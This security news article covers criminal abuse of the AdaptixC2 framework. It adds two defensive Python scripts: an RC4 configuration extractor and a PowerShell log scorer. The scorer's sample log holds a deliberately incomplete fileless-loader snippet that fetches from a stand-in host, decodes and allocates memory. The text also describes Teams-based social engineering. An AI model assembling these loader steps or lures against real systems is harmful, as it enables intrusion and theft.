AdaptixC2: The Open-Source Pentesting Tool Now Used by Hackers
Researchers at Palo Alto Networks' Unit 42 have reported a rise in intrusions that use AdaptixC2, an open-source command-and-control framework built for penetration testing and now being abused by criminal operators. Unit 42 first observed it in real incidents in May 2025 while investigating compromises of corporate networks.
Unlike the well-known post-exploitation and C2 frameworks, AdaptixC2 long stayed out of sight and rarely surfaced in real-world attacks. The recent cases show that threat actors are now folding it into their own playbooks.
AdaptixC2 has a modular architecture and was intended to emulate adversary behaviour during red team exercises. Its interface lists agents and sessions in a clear, visual layout, which makes managing the infrastructure straightforward. The feature set covers arbitrary command execution, file transfer, data exfiltration, and management of active connections.
Agents are available as x86 and x64 builds and can be compiled as standalone executables, DLLs, Windows service binaries, or raw shellcode. Core agent functions include directory listing, file creation and deletion, process management, and execution of arbitrary binaries.
For covert communication the framework supports SOCKS4/5 proxying, port forwarding, and adjustable chunk sizes for transfers, which lets its traffic blend with legitimate flows. Extender modules allow operators to plug in custom payloads and evasion techniques, and Beacon Object File (BOF) support lets C-based modules run directly in the agent's memory. Each agent carries an RC4-encrypted configuration blob made up of a size field, the encrypted configuration data, and a 16-byte RC4 key. Because the key is stored alongside the ciphertext, the configuration can be recovered from a captured sample without any runtime interaction.
AdaptixC2 ships three communication profiles: HTTP, SMB, and TCP. In the documented intrusions HTTP was by far the most common, with attackers customising server addresses, port numbers, SSL/TLS usage, HTTP methods, URIs, header sets, and User-Agent strings.
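The layout described above (size field, RC4 ciphertext, then the 16-byte key) is enough to write a static extractor. The script below is an added example, not code from the article or from the AdaptixC2 project: it implements RC4, scans a byte image for an offset at which a blob decrypts cleanly, and decodes the result. The decrypted field layout (host, port, use_ssl, method, uri, user_agent as length-prefixed ASCII strings and little-endian integers), the size bounds, and the sample image with its fixed key are all assumptions constructed for the demonstration; the real field order is documented in Unit 42's report, not here.

```python
"""Recover an AdaptixC2-style RC4-encrypted configuration from a sample image.

Blob layout per the article: 4-byte size || RC4 ciphertext || 16-byte key.
The decrypted field layout below is a constructed illustration, not the real one.
"""
import struct

KEY_LEN = 16          # key length stated in the article
MIN_CFG_SIZE = 8      # assumption: bounds used to reject implausible size fields
MAX_CFG_SIZE = 4096


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); the same call both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _read_str(buf: bytes, off: int) -> tuple[str, int]:
    """Read a u32-length-prefixed ASCII string (assumed encoding)."""
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    raw = buf[off:off + n]
    if len(raw) != n:
        raise ValueError("truncated string")
    return raw.decode("ascii"), off + n


def decode_fields(plain: bytes) -> dict:
    """Assumed HTTP-profile layout: host, port, use_ssl, method, uri, user_agent."""
    off = 0
    host, off = _read_str(plain, off)
    (port,) = struct.unpack_from("<I", plain, off)
    off += 4
    use_ssl = plain[off]          # IndexError here means the blob ended early
    off += 1
    method, off = _read_str(plain, off)
    uri, off = _read_str(plain, off)
    user_agent, off = _read_str(plain, off)
    if off != len(plain):
        raise ValueError("trailing bytes")
    return {"host": host, "port": port, "use_ssl": bool(use_ssl),
            "method": method, "uri": uri, "user_agent": user_agent}


def encode_fields(cfg: dict) -> bytes:
    """Inverse of decode_fields; used only to build the constructed sample."""
    def s(text: str) -> bytes:
        raw = text.encode("ascii")
        return struct.pack("<I", len(raw)) + raw
    return (s(cfg["host"]) + struct.pack("<I", cfg["port"]) + bytes([int(cfg["use_ssl"])])
            + s(cfg["method"]) + s(cfg["uri"]) + s(cfg["user_agent"]))


def build_config_blob(plain: bytes, key: bytes) -> bytes:
    """size || RC4(key, plain) || key, matching the layout described in the article."""
    ct = rc4(key, plain)
    return struct.pack("<I", len(ct)) + ct + key


def decrypt_config_blob(blob: bytes) -> bytes:
    """Split size || ciphertext || key and decrypt with the key that ships in the blob."""
    (size,) = struct.unpack_from("<I", blob, 0)
    if len(blob) < 4 + size + KEY_LEN:
        raise ValueError("truncated blob")
    ct = blob[4:4 + size]
    key = blob[4 + size:4 + size + KEY_LEN]
    return rc4(key, ct)


def scan_image(image: bytes) -> list[tuple[int, dict]]:
    """Try every offset as a size field; keep those that decrypt to a parseable config."""
    hits = []
    for off in range(max(0, len(image) - 3)):
        (size,) = struct.unpack_from("<I", image, off)
        end = off + 4 + size + KEY_LEN
        if not MIN_CFG_SIZE <= size <= MAX_CFG_SIZE or end > len(image):
            continue
        try:
            cfg = decode_fields(decrypt_config_blob(image[off:end]))
        except (ValueError, struct.error, IndexError):
            continue
        hits.append((off, cfg))
    return hits


# Constructed sample: a config embedded between filler bytes, encrypted under a fixed key.
SAMPLE_KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4c3d2e1f0")
SAMPLE_CFG = {"host": "cdn-updates.example", "port": 443, "use_ssl": True,
              "method": "POST", "uri": "/api/v1/telemetry",
              "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}
SAMPLE_IMAGE = (b"\x90" * 37
                + build_config_blob(encode_fields(SAMPLE_CFG), SAMPLE_KEY)
                + b"\x00" * 21)

if __name__ == "__main__":
    for off, cfg in scan_image(SAMPLE_IMAGE):
        print(f"config at offset {off}: {cfg}")
```

The brute-force scan is deliberately strict: a candidate offset is accepted only if the size field is plausible, the blob fits in the image, and the decrypted bytes parse with no trailing data, which keeps false positives negligible even over large binaries. Against a real sample the decode_fields routine would be replaced with the actual field layout, but the RC4 step and the scanning strategy stay the same.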
In one campaign the attackers delivered the malware through fraudulent Microsoft Teams messages impersonating IT support. Victims were talked into starting a Quick Assist session, which the attackers used to deliver a multi-stage PowerShell script. The script fetched XOR-encoded shellcode from a legitimate hosting service, decoded it in memory, and executed it through .NET dynamic invocation, so the payload never touched disk.
Persistence was achieved with a shortcut in the Startup folder. Once installed, the attackers ran reconnaissance with tools such as nltest.exe, whoami.exe, and ipconfig.exe before settling into a stable command-and-control channel.
In another case a PowerShell script, believed to have been produced with AI assistance, decoded a Base64-encoded AdaptixC2 payload into an allocated memory region, marked that region executable with VirtualProtect, and ran it in place.
To keep access, the adversaries used DLL hijacking in the Templates directory together with registry autorun entries. Stylistic tells in the script, such as numbered comments, checkmark-style status messages, and other recurring formulaic patterns, pointed to automated code generation. The incident shows how AI can speed up the production of fileless loaders.
The appearance of AdaptixC2 in real intrusions is part of a wider trend: tooling built for penetration testing is being repurposed as attack infrastructure. Unit 42 advises defenders to watch for code that runs purely in memory via dynamic invocation, and to extract and decrypt the RC4-encrypted configuration from captured agents to map adversary infrastructure. Hidden proxy tunnels and port forwarding, which AdaptixC2 relies on heavily, deserve particular attention in detection engineering.
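The loader traits described in this article (remote fetch, Base64 and XOR decoding, VirtualProtect/VirtualAlloc, .NET dynamic invocation, and the numbered-comment and checkmark tells of AI-generated scripts) can be turned into a simple triage scorer for PowerShell script block logs. The script below is an added example and not part of the article or of any vendor detection content: the indicator patterns, their weights, the threshold, and the two script block log entries are all assumptions constructed for the demonstration and would need tuning against real telemetry. The first sample entry deliberately references the relevant APIs without defining them, so it is not a working loader.

```python
"""Score PowerShell script block log entries for the in-memory loader traits above."""
import re

# (name, weight, pattern). Patterns and weights are assumptions for this example.
INDICATORS = [
    ("reflection-load", 3, r"\[(?:System\.)?Reflection\.Assembly\]::Load"),
    ("dynamic-invoke", 4, r"GetDelegateForFunctionPointer|DynamicInvoke|GetProcAddress"),
    ("memory-protect", 3, r"\bVirtual(?:Protect|Alloc)\b"),
    ("xor-decode", 2, r"-bxor\b"),
    ("base64-payload", 1, r"FromBase64String"),
    ("remote-fetch", 1, r"Invoke-WebRequest|DownloadString|DownloadData|Net\.WebClient"),
    ("checkmark-status", 1, r"[\u2713\u2714]"),          # "[✓] stage downloaded" style output
    ("numbered-comments", 1, r"^\s*#\s*\d+[.)]\s"),       # "# 1. Fetch the encoded stage"
]
THRESHOLD = 6   # assumption: a single benign Base64 decode or download must not alert

_COMPILED = [(name, w, re.compile(p, re.IGNORECASE | re.MULTILINE)) for name, w, p in INDICATORS]


def score_script_block(text: str) -> tuple[int, list[str]]:
    """Sum the weights of every indicator present in one script block."""
    score = 0
    matched = []
    for name, weight, rx in _COMPILED:
        if rx.search(text):
            score += weight
            matched.append(name)
    return score, matched


def triage(events: list[dict]) -> list[dict]:
    """Return the events whose script block reaches THRESHOLD, with the reasons."""
    alerts = []
    for ev in events:
        score, matched = score_script_block(ev["script_block"])
        if score >= THRESHOLD:
            alerts.append({"event_id": ev["event_id"], "host": ev["host"],
                           "score": score, "matched": matched})
    return alerts


# Constructed script block log entries (Windows event 4104 style), not real telemetry.
SAMPLE_EVENTS = [
    {"event_id": "4104-0001", "host": "WS-0142",
     "script_block": """# 1. Fetch the encoded stage
$enc = (New-Object Net.WebClient).DownloadString('https://paste.example/raw/blob')
Write-Host "[\u2713] stage downloaded"
# 2. Decode it
$b = [Convert]::FromBase64String($enc)
$sc = foreach ($x in $b) { $x -bxor 0x5A }
# 3. Make it executable and run it
$addr = [Win32]::VirtualAlloc(0, $sc.Length, 0x3000, 0x40)
$fn = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($addr, [Action])
"""},
    {"event_id": "4104-0002", "host": "WS-0077",
     "script_block": """# Install the internal root CA from an inline Base64 blob
$raw = [Convert]::FromBase64String($CertBase64)
$cert = New-Object Security.Cryptography.X509Certificates.X509Certificate2(,$raw)
Invoke-WebRequest -Uri https://intranet.example/config.json -OutFile C:\\ProgramData\\app\\config.json
"""},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The weighting matters more than the individual patterns: Base64 decoding and downloads are everywhere in legitimate administration, so they score low on their own, while a function-pointer delegate or a page-protection change in a script is rare enough to carry most of the weight. In production this logic would sit behind script block logging (event 4104) with the indicator list reviewed against the environment's own admin scripts before the threshold is fixed.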